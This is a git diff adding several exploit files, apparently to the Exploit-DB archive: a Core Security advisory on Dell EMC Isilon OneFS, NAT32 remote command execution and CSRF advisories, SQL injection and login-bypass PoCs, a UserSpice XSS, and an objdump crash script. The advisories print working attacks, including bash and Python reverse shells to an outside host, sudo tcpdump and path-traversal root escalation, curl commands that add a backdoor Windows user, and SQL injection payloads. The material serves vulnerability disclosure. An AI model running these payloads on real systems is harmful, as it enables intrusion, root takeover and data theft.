diff --git a/exploits/linux/webapps/44039.txt b/exploits/linux/webapps/44039.txt new file mode 100644 index 000000000..d85819bb7 --- /dev/null +++ b/exploits/linux/webapps/44039.txt @@ -0,0 +1,538 @@ +Core Security - Corelabs Advisory +http://corelabs.coresecurity.com/ +Dell EMC Isilon OneFS Multiple Vulnerabilities + +1. **Advisory Information** + +Title: Dell EMC Isilon OneFS Multiple Vulnerabilities +Advisory ID: CORE-2017-0009 +Advisory URL: +http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities +Date published: 2018-02-14 +Date of last update: 2018-02-14 +Vendors contacted: Dell EMC +Release mode: Coordinated release + +2. **Vulnerability Information** + +Class: Cross-Site Request Forgery [CWE-352], Improper Privilege +Management [CWE-269], Improper Privilege Management [CWE-269], Improper +Neutralization of Input During Web Page Generation [CWE-79], Improper +Neutralization of Input During Web Page Generation [CWE-79], Improper +Neutralization of Input During Web Page Generation [CWE-79], Improper +Neutralization of Input During Web Page Generation [CWE-79], Improper +Neutralization of Input During Web Page Generation [CWE-79], Improper +Neutralization of Input During Web Page Generation [CWE-79] +Impact: Code execution +Remotely Exploitable: Yes +Locally Exploitable: Yes +CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, +CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, +CVE-2018-1202 + +3. **Vulnerability Description** + +Dell EMC's website states that:[1] + +The EMC Isilon scale-out NAS storage platform combines modular hardware +with unified software to harness unstructured data. Powered by the OneFS +operating system, an EMC Isilon cluster delivers a scalable pool of +storage with a global namespace. + +The platform's unified software provides centralized Web-based and +command-line administration to manage the following features: + +- A cluster that runs a distributed file system + +- Scale-out nodes that add capacity and performance + +- Storage options that manage files and tiering + +- Flexible data protection and high availability + +- Software modules that control costs and optimize resources + +Multiple vulnerabilities were found in the Isilon OneFS Web console that +would allow a remote attacker to gain command execution as root. + +4. **Vulnerable Packages** + +. Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) +. Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs) +. Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs) +. Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs) +. Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188, + CVE-2018-1201, CVE-2018-1204, CVE-2018-1213) +. Dell EMC Isilon OneFS version 7.1.1.11 (CVE-2018-1186, CVE-2018-1201, + CVE-2018-1202, CVE-2018-1204, CVE-2018-1213) + +Other products and versions might be affected, but they were not tested. + +5. **Vendor Information, Solutions and Workarounds** + +Dell EMC provided a link to the Download for Isilon OneFS page which +contains the patches: + +. https://support.emc.com/downloads/15209_Isilon-OneFS + +6. **Credits** + +These vulnerabilities were discovered and researched by Ivan Huertas and +Maximiliano Vidal from Core Security Consulting Services. The +publication of this advisory was coordinated by Alberto Solino from Core +Advisories Team. + +7. **Technical Description / Proof of Concept Code** + +The Web console contains several sensitive features that are vulnerable +to cross-site request forgery. We describe this issue in section 7.1. + +Sections 7.2 and 7.3 show two vectors to escalate privileges to root. + +Various persistent cross-site scripting issues are presented in the +remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). + +7.1. **Cross-site request forgery leading to command execution** + +[CVE-2018-1213] +There are no anti-CSRF tokens in any forms on the Web interface. +This would allow an attacker to submit authenticated requests when an +authenticated user browses an attacker-controlled domain. + +The Web console contains a plethora of sensitive actions that can be +abused, such as adding new users with SSH access or re-mapping existing +storage directories to allow read-write-execute access to all users. + +All requests are JSON-encoded, which in some cases might hinder +exploitation of CSRF vulnerabilities. However, the application does not +verify the content-type set. This allows an attacker to exploit the CSRF +vulnerabilities by setting a text/plain content-type and sending the +request body as JSON_PAYLOAD=ignored. + +The following proof of concept creates a new user and assigns him a new +role with enough privileges to log in via SSH, configure identifies, +manage authentication providers, configure the cluster and run the +remote support tools. + +/----- + + +
+ +
+
+ +
+ + + +-----/ + +7.2. **Privilege escalation due to incorrect sudo permissions** + +[CVE-2018-1203] +The compadmin user can run the tcpdump binary with root privileges via +sudo. This allows for local privilege escalation, as tcpdump can be +instructed to run shell commands when rotating capture files. + +/----- +pepe-1$ id +uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) +pepe-1$ cat /tmp/lala.sh +#!/bin/bash + +bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 +-----/ + +Once the desired shell script is in place, the attacker can run tcpdump +as follows to trigger the execution: + +/----- +pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump +tcpdump: WARNING: unable to contact casperd +tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size +65535 bytes +/tmp/lala.sh: connect: Connection refused +/tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused +/tmp/lala.sh: connect: Connection refused +/tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused +-----/ + +As can be seen below, the script runs with root privileges: + +/----- +$ nc -lvp 8888 +Listening on [0.0.0.0] (family 0, port 8888) +Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, +sport 57692) +bash: no job control in this shell +[root@pepe-1 /compadmin]# id +uid=0(root) gid=0(wheel) +groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) +-----/ + +7.3. **Privilege escalation via remote support scripts** + +[CVE-2018-1204] +From the documentation: + +"OneFS allows remote support through EMC Secure Remote Services (ESRS) +which monitors your EMC Isilon cluster, and with your permission, allows +remote access to Isilon Technical Support personnel to gather cluster +data and troubleshoot issues." + +"After you enable remote support through ESRS, Isilon Technical Support +personnel can request logs with scripts that gather EMC Isilon cluster +data and then upload the data. +The remote support scripts based on the Isilon isi_gather_info +log-gathering tool are located in the /ifs/data/Isilon_Support/ +directory on each node." + +"Additionally, isi_phone_home, a tool that focuses on cluster- and +node-specific data, is enabled once you enable ESRS. This tool is +pre-set to send information about your cluster to Isilon Technical +Support on a weekly basis. You can disable or enable isi_phone_home from + the OneFS command-line interface." + +As a cluster administrator or compadmin, it is possible to enable the +remote support functionality, hence enabling the isi_phone_home tool via +sudo. This tool is vulnerable to a path traversal when reading the +script file to run, which would enable an attacker to execute arbitrary +python code with root privileges. + +If remote support is not enabled, an attacker could perform the +following operations in order to enable it: + +/----- +pepe-1$ sudo isi network subnets create 1 ipv4 1 +pepe-1$ sudo isi network pools create 1.0 +pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes +--primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no +--gateway-access-pools=1.0 +-----/ + +The isi_phone_home tool is supposed to run scripts located in the +root-only writable directory /usr/local/isi_phone_home/script. +However, the provided script name is used to construct the file path +without sanitization, allowing an attacker to reference other locations. + +/----- +def run_script(script_file_name): + script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name + if os.path.isfile(script_path): + cmd = 'python ' + script_path + ' 2>&1 ' + command_thread = command.Command(cmd) + exit_code, output = +command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) + if exit_code: + logging.error("Error: {0} running script: {1} +".format(str(exit_code), output)) + else: + logging.error("File: {0} list_file_name doesn't exist +".format(script_path)) +-----/ + +The final step would be to create a malicious python script on any +writable location and call it via the isi_phone_tool using sudo. +Keep in mind that the previous steps are not required if the system does +already have remote support enabled. + +/----- +pepe-1$ cat /tmp/lala.py +#!/usr/bin/env python + +import socket,subprocess,os +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect(("192.168.1.66",8888)) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +p=subprocess.call(["/bin/sh","-i"]) + +pepe-1$ sudo /usr/bin/isi_phone_home --script-file +../../../../../tmp/lala.py +-----/ + +/----- +$ nc -lvp 8888 +Listening on [0.0.0.0] (family 0, port 8888) +Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, +sport 56807) +pepe-1# id +uid=0(root) gid=0(wheel) +groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) +-----/ + +7.4. *Persistent cross-site scripting in the cluster description* + +[CVE-2018-1186] +The description parameter of the /cluster/identity endpoint is +vulnerable to cross-site scripting. + +After the cluster's description is updated, the payload will be executed +every time the user opens the Web console. + +/----- +PUT /platform/3/cluster/identity HTTP/1.1 +Host: 192.168.1.11:8080 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) +Gecko/20100101 Firefox/55.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Content-Length: 61 +Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; +Connection: close + +{"description":"my cluster"} +-----/ + +7.5. **Persistent cross-site scripting in the Network Configuration page** + +[CVE-2018-1187] +The description parameter of the /network/groupnets endpoint is +vulnerable to cross-site scripting. + +After the description is updated, the payload will be executed every +time the user opens the network configuration page. + +/----- +POST /platform/4/network/groupnets HTTP/1.1 +Host: 192.168.1.11:8080 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) +Gecko/20100101 Firefox/55.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Content-Type: application/json +Content-Length: 186 +Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; +Connection: close + +{"description":"lala","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} +-----/ + +7.6. **Persistent cross-site scripting in the Authentication Providers +page** + +[CVE-2018-1188] +The realm parameter of the /auth/settings/krb5/realms endpoint is +vulnerable to cross-site scripting. + +After the realm is updated, the payload will be executed every time the +user opens the Kerberos tab of the Authentication Providers page. + +/----- +POST /platform/1/auth/settings/krb5/realms HTTP/1.1 +Host: 192.168.1.11:8080 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) +Gecko/20100101 Firefox/55.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Content-Type: application/json +Content-Length: 78 +Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; +Connection: close + +{"is_default_realm":true,"kdc":[],"realm":"ASDASD","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} +-----/ + +7.8. **Persistent cross-site scripting in the Job Operations page** + +[CVE-2018-1201] +The description parameter of the /job/policies endpoint is vulnerable to +cross-site scripting. + +After the description is updated, the payload will be executed every +time the user opens the Impact Policies section of the Job Operations +page. + +/----- +POST /platform/1/job/policies HTTP/1.1 +Host: 192.168.1.11:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Content-Length: 210 +Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; +Connection: close + +{"name":"my policy","description":"","intervals":[{"begin":"Sunday +00:00","end":"Sunday +00:00","impact":"Low"},{"impact":"Low","begin":"Sunday +01:03","end":"Monday 01:01"}]} +-----/ + +7.9. **Persistent cross-site scripting in the NDMP page** + +[CVE-2018-1202] +The name parameter of the /protocols/ndmp/users endpoint is vulnerable +to cross-site scripting. + +After the name is updated, the payload will be executed every time the +user opens the NDMP Settings section of the NDMP page. + +/----- +POST /platform/3/protocols/ndmp/users HTTP/1.1 +Host: 192.168.1.11:8080 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) +Gecko/20100101 Firefox/55.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Content-Length: 64 +Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; +Connection: close + +{"name":"","password":"123123"} +-----/ + +8. **Report Timeline** + +2017-09-25: Core Security sent an initial notification to Dell EMC, +including a draft advisory. +2017-09-26: Dell EMC confirmed reception and informed an initial +response would be ready by October 5th. +2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities +reported except one, for which evaluation will be finalized soon. Dell +EMC stated that, for the confirmed issues, a remediation plan will be +provided by 10/16. +2017-10-05: Core Security thanked the follow up email. +2017-10-06: Dell EMC reported an update on one privilege escalation +vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE +both are equivalent to admin level access'. They said they will be +updating the documentation to make it clearer. +2017-10-11: Core Security thanked for the clarification and confirmed +that section will be removed from the final advisory. +2017-10-16: Dell EMC sent a schedule for fixing six of the reported +vulnerabilities, with specific dates for every product's version. +2017-10-16: Core Security thanked the information and said it will +analyze the proposals sent once all the data is available. +2017-10-19: Dell EMC sent a schedule for the remaining three reported +vulnerabilities, with specific dates for every product's version. +2017-10-31: Core Security on the schedule sent, stating that fixing the +vulnerabilities by June 2018 is unacceptable given current industry +standards. Requested a review of the timeline or a thorough explanation +that justifies such delay. +2017-11-01: Dell EMC answered back stating that after reviewing the +original schedule, they said they believe they could have fixes ready +for versions 8.0.x and 8.1.x by January 2018. Only caveat is the +vulnerability 7.1 that might be pushed past January, although they said +they think they could meet the January deadline. +2017-11-13: Core Security thanked Dell's review of the release dates and +agreed on the proposed schedule, stating Core Security would like to +publish a single advisory for all the vulnerabilities reported. +Also requested CVE IDs for +each of the issues. +2018-01-16: Core Security asked for a status update on the release date +for the fixes since there was no update from Dell EMC. +2018-01-17: Dell EMC answered back stating they are awaiting +confirmation from the product team about the exact dates of release. +They said they will get back to us by the end of this week. Dell EMC +also asked our GPG public key again. +2018-01-18: Core Security thanked for the update and sent the advisory's +public GPG key. +2018-01-19: Dell EMC stated they are currently working on drafting their +advisory and will send it back to us (including CVEs) once they have the +necessary approvals. +2018-01-23: Dell EMC asked for our updated draft advisory. +2018-01-23: Core Security sent the updated draft advisory to Dell EMC. +2018-01-25: Dell EMC notified that the team are targeting to have the +fix available by February 12th. Additionally, Dell will send its draft +advisory by January 31th. +2018-01-29: Core Security thanked for the update and proposed February +14th as publication date. +2018-01-31: Dell EMC informed Core Security that they agreed to release +on February 14th. They also provided CVE IDs for each vulnerability +reported. +2018-02-01: Dell EMC sent its draft advisory. +2018-02-14: Advisory CORE-2017-0009 published. + +9. **References** + +[1] +https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm + +10. **About CoreLabs** + +CoreLabs, the research center of Core Security, is charged with +anticipating the future needs and requirements for information security +technologies. +We conduct our research in several important areas of computer security +including system vulnerabilities, cyber attack planning and simulation, +source code auditing, and cryptography. Our results include problem +formalization, identification of vulnerabilities, novel solutions and +prototypes for new technologies. CoreLabs regularly publishes security +advisories, technical papers, project information and shared software +tools for public use at: http://corelabs.coresecurity.com. + +11. **About Core Security** + +Core Security provides companies with the security insight they need to +know who, how, and what is vulnerable in their organization. The +company's threat-aware, identity & access, network security, and +vulnerability management solutions provide actionable insight and +context needed to manage security risks across the enterprise. This +shared insight gives customers a comprehensive view of their security +posture to make better security remediation decisions. Better insight +allows organizations to prioritize their efforts to protect critical +assets, take action sooner to mitigate access risk, and react faster if +a breach does occur. + +Core Security is headquartered in the USA with offices and operations in +South America, Europe, Middle East and Asia. To learn more, contact Core +Security at (678) 304-4500 or info@coresecurity.com + + +12. **Disclaimer** + +The contents of this advisory are copyright (c) 2017 Core Security and +(c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution +Non-Commercial Share-Alike 3.0 (United States) License: +http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \ No newline at end of file diff --git a/exploits/php/webapps/44036.txt b/exploits/php/webapps/44036.txt new file mode 100644 index 000000000..5a3a86ebe --- /dev/null +++ b/exploits/php/webapps/44036.txt @@ -0,0 +1,18 @@ +# Exploit Title: Social Oauth Login PHP - Authentication Bypass +# Dork: N/A +# Date: 2018-02-12 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: https://www.codester.com/items/4554/social-oauth-login-php +# Version: All version +# Category: Webapps +# CVE: N/A +# # # # # +# Description: +# With this exploit,attacker can bypass admin login authentication. +# # # # # +# Proof of Concept : + +http://localhost/PATH/adminLogin.php + +# Username : anything +# Password : ' or ''=' \ No newline at end of file diff --git a/exploits/php/webapps/44037.txt b/exploits/php/webapps/44037.txt new file mode 100644 index 000000000..67bf8fc21 --- /dev/null +++ b/exploits/php/webapps/44037.txt @@ -0,0 +1,36 @@ +# Exploit Title: SOA - School Management Software with Integrated +Parents/Students Portal & Mobile App - 'access_login' SQL Injection +# Dork: N/A +# Date: 2018-02-14 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: +https://codecanyon.net/item/soa-school-management-software-with-integrated-parents-students-portal/20435367?s_rank=495 +# Version: All version +# Category: Webapps +# CVE: N/A +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands. +# # # # # +# Proof of Concept : + +SQLI : + +http://localhost/PATH/administrator/index.php + +# Parameter : access_login (POST) +# Type: Error based +# Title: MySQL >= 5.6.35 AND Error based - extractvalue,updatexml +(XPATH query) +# Payload 1: 1') and extractvalue(1,concat(0x3a,user(),0x3a,version()))# +# Payload 2: 1') and updatexml(1, concat(0x3a, version(),0x3a,user()),1)# +####################################### +# Discrption : The 'username' field is vulnerable in this script +('access_login' parameter).First inject payload into this parameter. +# then put anything in password and click login. You will have XPATH syntax +error in the next page that contains user and db_name . +# You can find all tables and any information from database by using XPATH +query .You can use extractvalue() or updatexml() for generating error . + +Username : 1') and extractvalue(1,concat(0x3a,user(),0x3a,version()))# +Password : anything \ No newline at end of file diff --git a/exploits/php/webapps/44038.txt b/exploits/php/webapps/44038.txt new file mode 100644 index 000000000..c475cb160 --- /dev/null +++ b/exploits/php/webapps/44038.txt @@ -0,0 +1,34 @@ +Application UserSpice PHP user management +Vulnerability userSpice <= 4.3 Persistent Cross Site Scripting +URL https://userspice.com +Date 2.13.2018 +Author Dolev Farhi + + +1. Login with a regular user +2. Navigate to Public profile +3. Edit your bio +4. Enter XSS payload +5. Once anyone visits the Bio page the payload will execute + +POST /users/edit_profile.php HTTP/1.1 +Host: 192.168.56.2 +Content-Length: 59 +Cache-Control: max-age=0 +Origin: http://192.168.56.2 +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://192.168.56.2/users/edit_profile.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,he;q=0.8 +Connection: close + +bio=&csrf=8b1339546d6af1e7536da0a705302e9c&update_bio= + +Vulnerable code: + +

id)?>

+

+ \ No newline at end of file diff --git a/exploits/windows/dos/44035.py b/exploits/windows/dos/44035.py new file mode 100755 index 000000000..605f5b48f --- /dev/null +++ b/exploits/windows/dos/44035.py @@ -0,0 +1,33 @@ +# Exploit Title: Objdump - Integer Overflow Crash POC +# Date: 12.02.2018 +# Exploit Author: r4xis +# Tested Version: 2.26.1 +# Vuln Version: <2.29.1 +# CVE: cve-2018-6323 +# Tested on: Ubuntu 16.04 32-bit +# Vulnerability Details: +# https://www.cvedetails.com/cve/CVE-2018-6323/ +# https://sourceware.org/bugzilla/show_bug.cgi?id=22746 + + +import os + +hello = "#include\nint main(){printf(\"HelloWorld!\\n\"); return 0;}" +f = open("helloWorld.c", 'w') +f.write(hello) +f.close() + +os.system("gcc -c helloWorld.c -o test") +# file test +# test: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped + +f = open("test", 'rb+') +f.read(0x2c) +f.write("\xff\xff") # 65535 +f.read(0x244-0x2c-2) +f.write("\x00\x00\x00\x20") # 536870912 +f.close() +# readelf -h test +# Number of program headers: 65535 (536870912) + +os.system("objdump -x test; rm -r helloWorld.c test") \ No newline at end of file diff --git a/exploits/windows/webapps/44033.txt b/exploits/windows/webapps/44033.txt new file mode 100644 index 000000000..d7e8551fc --- /dev/null +++ b/exploits/windows/webapps/44033.txt @@ -0,0 +1,141 @@ +[+] Credits: hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt +[+] ISR: Apparition Security + +[-_-] D1rty0tis + + +Vendor: +============= +www.nat32.com + + +Product: +================= +NAT32 Build (22284) + + +NAT32 is a versatile IP Router implemented as a WIN32 application. + + +Vulnerability Type: +=================== +Remote Command Execution + + +CVE Reference: +============== +CVE-2018-6940 + + +Security Issue: +================ +NAT32 listens on Port 8080 for its Web interface. + +C:\>netstat -ano | findstr 8080 + TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 3720 + + +If the 'Password Checking' (BASIC authentication) feature is NOT enabled (user must select it under config tab) then remote attackers who can reach +NAT32 can potentially execute arbitrary commands, if authentication is enabled they will get 'Unauthorized' server reply, however, read on ... + +e.g. + +Add user account. + +C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add" + + +
run start net user D1rty0Tis abc123 /add Done
+
+ + +If NAT32 'Password Checking' feature IS enabled, remote attackers can STILL potentially issue arbitrary commands exploiting a +Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated NAT32 users click a malicious link +or visit an attacker controlled webpage. + +Also worth mentioning, NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily +revealed if sniffed on network. + +When 'Password Checking' is enabled attackers using Ajax calls via XSS would need to use a combination of '%0D%0A' and double encoding +to deal with 'white-space' in order for the payload to stay intact. + +%25 for '%' sign then 20 (%2520) = %20, using %20 or %2B will not cut it, however '%0D%0A' (CRLF) and '%2520' encoding serves us well. + +NAT32 has an interesting Command 'EXECR' that can allow attackers to capture Command output response from the server to see right away if an +attack was success or not. + +e.g. + +Add account and get response (EXECR) + +HTTP Response: + + +
The command completed successfully.
+
+execr net user D1rty0Tis abc123 /add Done
+
+ + +The NAT32 'winroute' Command will return host route information. + +XSS response + +e.g. + + + +
Destination    Mask              Nexthop      Metric IfIndex Type Proto Age
+0.0.0.0         0.0.0.0         192.168.1.2        10       b    4     3 21:41 [min:sec]
+127.0.0.0       255.0.0.0       127.0.0.1          306      1    3     3 22:04 [min:sec]
+127.0.0.1       255.255.255.255 127.0.0.1          306      1    3     3 22:04 [min:sec]
+127.255.255.255 255.255.255.255 127.0.0.1          306      1    3     3 22:04 [min:sec]
+
+ + +Exploit/POC: +============= +NET32 Password Checking not enabled... + +C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add" + + +NAT32 BASIC authentication enabled use XSS... + +Add backdoor account and capture CMD output using NAT32 'execr' shell command. +http://x.x.x.x:8080/shell?cmd= + +Get Windows Routes (info disclosure): +http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E + + + +Network Access: +=============== +Remote + + +Severity: +========= +High + + +Disclosure Timeline: +============================= +Vendor Notification: February 9, 2018 +Vendor acknowledgement: February 9, 2018 +Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018 +www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018 +February 14, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file diff --git a/exploits/windows/webapps/44034.txt b/exploits/windows/webapps/44034.txt new file mode 100644 index 000000000..494e3f93b --- /dev/null +++ b/exploits/windows/webapps/44034.txt @@ -0,0 +1,75 @@ +[+] Credits: hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CSRF-CVE-2018-6941.txt +[+] ISR: Apparition Security + +[-_-] D1rty0tis + + +Vendor: +============= +www.nat32.com + + +Product: +=========== +NAT32 Build (22284) + +NAT32® is a versatile IP Router implemented as a WIN32 application. + + +Vulnerability Type: +=================== +Remote Command Execution (CSRF) + + +CVE Reference: +============== +CVE-2018-6941 + + +Security Issue: +================ +CSRF issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution. + +Remote attackers can potentially execute arbitrary System Commands due to a Cross Site Request Forgery, if an authenticated NAT32 user clicks a malicious link +or visits an attacker controlled webpage as NAT32 performs no check for blind requests. + +Its also worth mentioning is NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily revealed if sniffed on network. + + +Exploit/POC: +============= +Backdoor clicker + + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: February 9, 2018 +Vendor acknowledgement: February 9, 2018 +Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018 +www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018 +February 14, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 331a4335b..4b8353484 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5493,6 +5493,7 @@ id,file,description,date,author,type,platform,port 43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android, 43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple, 44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos, +44035,exploits/windows/dos/44035.py,"GNU binutils 2.26.1 - Integer Overflow (POC)",2018-02-14,r4xis,dos,windows, 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, @@ -38037,6 +38038,12 @@ id,file,description,date,author,type,platform,port 44028,exploits/php/webapps/44028.txt,"TypeSetter CMS 5.1 - 'Host' Header Injection",2018-02-13,"Navina Asrani",webapps,php, 44029,exploits/php/webapps/44029.html,"TypeSetter CMS 5.1 - Cross-Site Request Forgery",2018-02-13,"Navina Asrani",webapps,php, 44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php, +44033,exploits/windows/webapps/44033.txt,"NAT32 2.2 Build 22284 - Remote Command Execution",2018-02-14,hyp3rlinx,webapps,windows, +44034,exploits/windows/webapps/44034.txt,"NAT32 2.2 Build 22284 - Cross-Site Request Forgery",2018-02-14,hyp3rlinx,webapps,windows, +44036,exploits/php/webapps/44036.txt,"Social Oauth Login PHP - Authentication Bypass",2018-02-14,L0RD,webapps,php, +44037,exploits/php/webapps/44037.txt,"SOA School Management - 'access_login' SQL Injection",2018-02-14,L0RD,webapps,php, +44038,exploits/php/webapps/44038.txt,"userSpice 4.3 - Cross-Site Scripting",2018-02-14,"Dolev Farhi",webapps,php, +44039,exploits/linux/webapps/44039.txt,"Dell EMC Isilon OneFS - Multiple Vulnerabilities",2018-02-14,"Core Security",webapps,linux, 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80